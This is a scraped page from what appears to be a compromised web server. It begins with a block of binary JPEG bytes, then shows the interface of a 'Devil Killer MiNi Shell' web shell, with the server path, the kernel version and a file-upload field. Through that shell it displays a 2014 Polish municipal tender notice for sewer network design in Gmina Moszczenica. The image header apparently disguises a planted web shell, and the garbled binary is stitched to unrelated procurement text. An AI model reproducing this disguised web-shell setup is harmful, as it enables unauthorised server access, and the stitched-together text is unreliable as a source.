JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140226/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20140226/66514-N-2014.html

<p class="kh_header"><b>Moszczenica: Wykonanie dokumentacji technicznej dot. Budowy sieci kanalizacji sanitarnych w m. Gazomia Stara, Białkowice, Gościmowice Drugie, Gościmowice Drugie - Powęziny i Moszczenica, ul. Cmentarna i ul. Lipowa oraz opracowanie koncepcji rozwiązania gospodarki ściekowej na terenie Gminy Moszczenica na obszarze nieskanalizowanym</b><br>
<b>Numer ogłoszenia: 66514 - 2014; data zamieszczenia: 26.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Moszczenica , ul. Kosowska 1, 97-310 Moszczenica, woj. łódzkie, tel. 044 6169570, faks 044 6169625.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.moszczenica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji technicznej dot. Budowy sieci kanalizacji sanitarnych w m. Gazomia Stara, Białkowice, Gościmowice Drugie, Gościmowice Drugie - Powęziny i Moszczenica, ul. Cmentarna i ul. Lipowa oraz opracowanie koncepcji rozwiązania gospodarki ściekowej na terenie Gminy Moszczenica na obszarze nieskanalizowanym.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie dokumentacji technicznej dot. budowy sieci kanalizacji sanitarnych w m. Gazomia Stara, Białkowice, Gościmowice Drugie, Gościmowice Drugie - Powęziny i Moszczenica, ul. Cmentarna, i ul. Lipowa oraz opracowanie koncepcji rozwiązania gospodarki ściekowej na terenie Gminy Moszczenica na obszarze nieskanalizowanym. Projektowane sieci kanalizacji sanitarnej przebiegać będą wzdłuż drogi wojewódzkiej Nr 716, dróg powiatowych i gminnych. Szacowana długość kanalizacji sanitarnej wynosi ok. 8 km. Szacowana ilość przyłączy kanalizacyjnych wynosi ok. 300 sztuk.
Wspólny Słownik Zamówień (CPV): 71320000-7 Usługi inżynieryjne w zakresie projektowania, 71322000-1  Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej, 71322200-3  Usługi projektowania rurociągów
Przedmiot zamówienia obejmuje: 1) opracowanie koncepcji rozwiązania gospodarki ściekowej na terenie całej Gminy Moszczenica w zakresie: a) przeprowadzenia analizy wydajności istniejących sieci kanalizacji sanitarnej oraz przepompowni ścieków pod kątem możliwości przyłączenia projektowanych, w ramach niniejszego zamówienia, sieci kanalizacyjnej (na odcinkach od miejsca gdzie będą następowały włączenia do oczyszczalni). b)  przedstawienia rozwiązania gospodarki ściekowej dla pozostałego obszaru Gminy Moszczenica (nieobjętego dokumentacją techniczną wykonaną w ramach niniejszego zamówienia), oceny stanu istniejącego, określenie niezbędnego zakresu robót dla osiągnięcia pożądanych efektów, jak również szacunkowe koszty ich realizacji i wstępny harmonogram czasowy. W założeniu zrzut ścieków z terenu Gminy Moszczenica będzie następował do istniejącej oczyszczalni ścieków. 2) wykonanie dokumentacji technicznej (niezbędnej dla  wyboru w drodze przetargu nieograniczonego Wykonawcy Robót), w zakresie: a) wykonanie map do celów projektowych wraz z niezbędnymi uzgodnieniami, b) wykonania projektów budowlanych , c) wykonania projektów wykonawczych, d) wykonania projektów usunięcia kolizji, e) opracowania specyfikacji technicznej wykonania i odbioru robót budowlanych, f) opracowania informacji dotyczącej bezpieczeństwa i ochrony zdrowia (BIOZ), g) wykonania opracowania dendrologicznego (drzewa do wycięcia), h) uzyskania wszelkich niezbędnych uzgodnień do projektów budowlanych (m.in. w Zespole Uzgadniania Dokumentacji, uzgodnienie z Wojewódzkim Zarządem Melioracji i Urządzeń Wodnych, PKP, Zakład Energetyczny, Konserwator Zabytków i wszystkich innych niezbędnych decyzji - wszystkie koszty ponosi Wykonawca), i) uzyskania decyzji o środowiskowych uwarunkowaniach zgody na realizację inwestycji , j) uzyskania decyzji lokalizacji celu publicznego, k) wykonania operatu wodno - prawnego oraz uzyskanie decyzji wodno - prawnej ., l) wykonania przedmiarów robót, kosztorysów inwestorskich szczegółowych i nakładczych szczegółowych (Kosztorysy inwestorskie i nakładcze (wraz z przedmiarami robót) należy wykonać z rozdzieleniem na etapy oraz na branżę instalacyjną, elektryczną i drogową)., m) wykonania projektu organizacji ruchu na czas robót, n) przygotowania wersji elektronicznej: projektu budowlanego, wykonawczego, specyfikacji technicznej wykonania i odbioru robót, informacji dotyczącej bezpieczeństwa i ochrony zdrowia (BIOZ), kosztorysów nakładczych - szczegółowych wraz z przedmiarem w formacie PDF , o) przygotowania wszystkich niezbędnych dokumentów i uzyskanie umów użyczenia od właścicieli działek przez które będzie przechodziła inwestycja.  Umowa użyczenia powinna zawierać załącznik graficzny w postaci mapy obejmującej teren użyczającego z zaznaczonym przebiegiem zarówno sieci jak i przyłącza, również naniesienie połączenia projektowanej studni kanalizacyjnej z budynkiem mieszkalnym oraz pisemną akceptację użyczającego (na tym załączniku graficznym) wyrażającym zgodę i akceptację lokalizacji odpowiednio sieci, przyłącza i lokalizacji przyłączenia do budynku.), p) wykonania pozostałych wytycznych, instrukcji i dokumentów w zakresie niezbędnym dla przeprowadzenia procedury wyboru Wykonawcy Robót., q) Uzyskanie decyzji pozwolenia na budowę
Przedmiot zamówienia obejmuje także sprawowanie nadzoru autorskiego podczas realizacji zadania objętego niniejszą dokumentacją techniczną.
Zakres projektu obejmuje budowę sieci kanalizacji sanitarnej w zakresie zaznaczonym na mapie - Zał. Nr 8 Do SIWZ.

Dokumentację projektową oraz kosztorysy należy wykonać z podziałem na etapy (każda miejscowość będzie stanowiła odrębny etap). 
Decyzja pozwolenia na budowę także musi uwzględniać wykonanie inwestycji w etapach.
Obowiązki Wykonawcy: 
- Wykonawca przedstawi Zamawiającemu wstępny projekt budowy sieci kanalizacji sanitarnej. Akceptacja przez Zamawiającego wstępnego projektu uprawnia Wykonawcę do wykonywania dalszych czynności związanych z realizacją przedmiotu zamówienia.
- Wykonawca obowiązany jest do uczestniczenia w naradach koordynacyjnych zwołanych przez Zamawiającego.
- Wykonawca przy wycenie uwzględni opłatę za uzyskanie wszelkich uzgodnień i pozwoleń 

Poszczególne elementy przedmiotu zamówienia należy wykonać w niżej podanej ilości egzemplarzy:
a) Koncepcja rozwiązania gospodarki ściekowej na terenie Gminy Moszczenica - 3 egz. w wersji papierowej i 1 egz. w wersji elektronicznej w formacie PDF na płycie CD.
b) mapy co celów projektowych (do przekazania Zamawiającemu - 3 egz. w formie papierowej oraz w wersji elektronicznej: wykonane w programie Auto CAD, GEO-MAP lub równoważnym i w wersji PDF)
c) dokumentacja projektowa (projekty budowlane) wraz ze wszystkimi uzgodnieniami - 5 egz. 
d) Projekty wykonawcze - 2 egz. 
e) Projekty usunięcia kolizji - 5 egz. 
f) projekt organizacji ruchu na czas robót - 2 egz. 
g) Projekt dendrologiczny - 3 egz. 
h) Operat wodno prawny - 3 egz. 
i) informacja dotycząca bezpieczeństwa i ochrony zdrowia (BIOZ), która będzie podstawą do opracowania projektu BIOZ -  5 egz. 
j) specyfikacja techniczna wykonania i odbioru robót - 2 egz. 
k) Przedmiary robót - po 1 egz. (w każdej branży dla każdej miejscowości- każdego etapu)
l) kosztorysy inwestorskie - szczegółowe - po 1 egz. (w każdej branży dla każdej miejscowości - każdego etapu)
m) kosztorysy nakładcze - szczegółowe - po 1 egz. (w każdej branży dla każdej miejscowości - każdego etapu)
n) Umowy użyczenia - po 3 egz.
o) wersja elektroniczna: projektu budowlanego i wykonawczego, specyfikacji technicznej wykonania i odbioru robót, informacji dotyczącej bezpieczeństwa i ochrony zdrowia (BIOZ), kosztorysów nakładczych - szczegółowych, przedmiarów w formacie PDF - po 1 szt. dla każdego etapu

Ważne: 
- Przy wycenie należy wliczyć opłatę za uzyskanie wszelkich uzgodnień i pozwoleń 
- Wykonawca zobowiązany jest na każde pisemne wezwanie Zamawiającego do aktualizacji kosztorysów inwestorskich przez okres 2 lat od daty odbioru dokumentacji technicznej bez dodatkowego wynagrodzenia.
Przedmiot zamówienia musi być realizowany na podstawie obowiązujących przepisów tj. w szczególności: 
a) Rozporządzenia Ministra Infrastruktury z dnia 2 września 2004r w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (tj. Dz. U. z 2013 poz. 1129), 
b) Rozporządzenia Ministra Infrastruktury z dnia 18 maja 2004r w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz.U. z 2004 nr 130 , poz. 1389).</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt. 6 ustawy w wysokości do 10 % wartości zamówienia podstawowego. 
Zamówienia uzupełniające polegają na powtórzeniu tego samego rodzaju zamówienia co zamówienie podstawowe.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.32.20.00-1, 71.32.22.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający żąda od wykonawcy wniesienia wadium w wysokości: 4 000 PLN.
2. Wadium wnosi się przed upływem terminu składania ofert.
3. Wadium może być wnoszone w jednej lub kilku następujących formach:
1) pieniądzu;
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - rozliczeniowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3) gwarancjach bankowych;
4) gwarancjach ubezpieczeniowych;
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. Dz. U. z 2007 r. Nr 42, poz. 275 z późn. zm.) 
4. Wadium  w formie pieniężnej należy wnieść na rachunek bankowy Zamawiającego w Banku: BS ZP o/ Moszczenica . Numer konta: 36 89730003 0070 0700 0707 0005 z adnotacją: Wadium - nr sprawy: INW.271. 6.2014.U.
Wadium musi być wniesione najpóźniej w terminie składania ofert.
5. Poręczenia lub gwarancje bankowe, gwarancje ubezpieczeniowe, poręczenia udzielone przez podmioty, o których mowa w art. 6 ust.3 pkt.4 lit. b ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej agencji Rozwoju Przedsiębiorczości (t.j. Dz. U. z 2007 r. Nr 42, poz. 275 z późn. zm.) również w w/w terminie winny znajdować się w kasie Urzędu Gminy. 
Uwaga: Nie należy załączać oryginału dokumentu wadialnego do oferty.
Potwierdzona kserokopia dowodu wniesienia wadium powinna być załączona do oferty.
Z chwilą zmiany terminu złożenia ofert przez Zamawiającego jednocześnie ulega zmianie termin (dzień) wpłaty wadium, godzina wpłaty pozostaje bez zmian chyba, że w zawiadomieniu o zmianie terminu złożenia ofert podano również zmienioną godzinę wpłaty wadium.
6. Z treści gwarancji (poręczenia) musi jednoznacznie wynikać jaki jest sposób reprezentacji Gwaranta. Gwarancja musi być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela Gwaranta. Podpis winien być sporządzony w sposób umożliwiający jego identyfikację np. złożony wraz z imienną pieczątką lub czytelny (z podaniem imienia i nazwiska).
Z treści gwarancji winno wynikać bezwarunkowe, na każde żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust.4a i ust. 5 ustawy.
7. Oferta niezabezpieczona akceptowaną formą wadium, przez cały okres związania ofertą zostanie odrzucona.
8. Za skuteczne wniesienie wadium w pieniądzu zamawiający uważa wadium, które w oznaczonym terminie znajdzie się na koncie zamawiającego. 
9. Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem pkt. XIV.
10. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano,
11. Zamawiający zwraca niezwłocznie wadium, na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
12. Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podstawie ust. 9, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez zamawiającego;
13. Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.
14. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w  odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy, nie złożył dokumentów  lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
15. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana: 1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie; 2) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy; 3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. 
Zamawiający uzna ten warunek za spełniony jeżeli Wykonawca złoży stosowne oświadczenie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu nastąpi na podstawie zasady spełnia/ nie spełnia, w oparciu o informacje zawarte w oświadczeniach i dokumentach żądanych na ich potwierdzenie przez Zamawiającego. Zamawiający uzna za spełniony jeżeli Wykonawca Wykaże, iż w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie wykonał co najmniej:
- 2 projekty budowlane lub budowlano -wykonawcze budowy lub rozbudowy sieci wodociągowej lub kanalizacyjnej lub wodociągowo - kanalizacyjnej o długości całkowitej minimum 2 km (jedna dokumentacja) z potwierdzeniem, że projekty te zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.
Zamawiający uzna ten warunek za spełniony jeżeli Wykonawca złoży stosowne oświadczenie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu nastąpi na podstawie zasady spełnia/ nie spełnia, w oparciu o informacje zawarte w oświadczeniach i dokumentach żądanych na ich potwierdzenie przez Zamawiającego. Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował minimum jedną osobą która posiada uprawnienia do projektowania lub inne ważne uprawnienia i dokumenty, które (zgodnie z obowiązującymi przepisami) pozwolą wykonać dokumentację techniczną w branży:
-	instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych
(W/w osoba musi posiadać minimum 5 lat doświadczenia zawodowego w projektowaniu)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu nastąpi na podstawie zasady spełnia/ nie spełnia, w oparciu o informacje zawarte w oświadczeniach i dokumentach żądanych na ich potwierdzenie przez Zamawiającego. Zamawiający uzna za spełniony jeżeli Wykonawca posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia - wraz z dokumentem potwierdzającym opłacenie ubezpieczenia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Zamawiający określa, iż usługi, których dotyczy obowiązek wskazania przez Wykonawcę w wykazie obejmuje tylko usługi potwierdzające spełnienie warunku wiedzy i doświadczenia określonego przez Zamawiającego w Rozdz. VIII ust. 1 pkt. 2 SIWZ.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
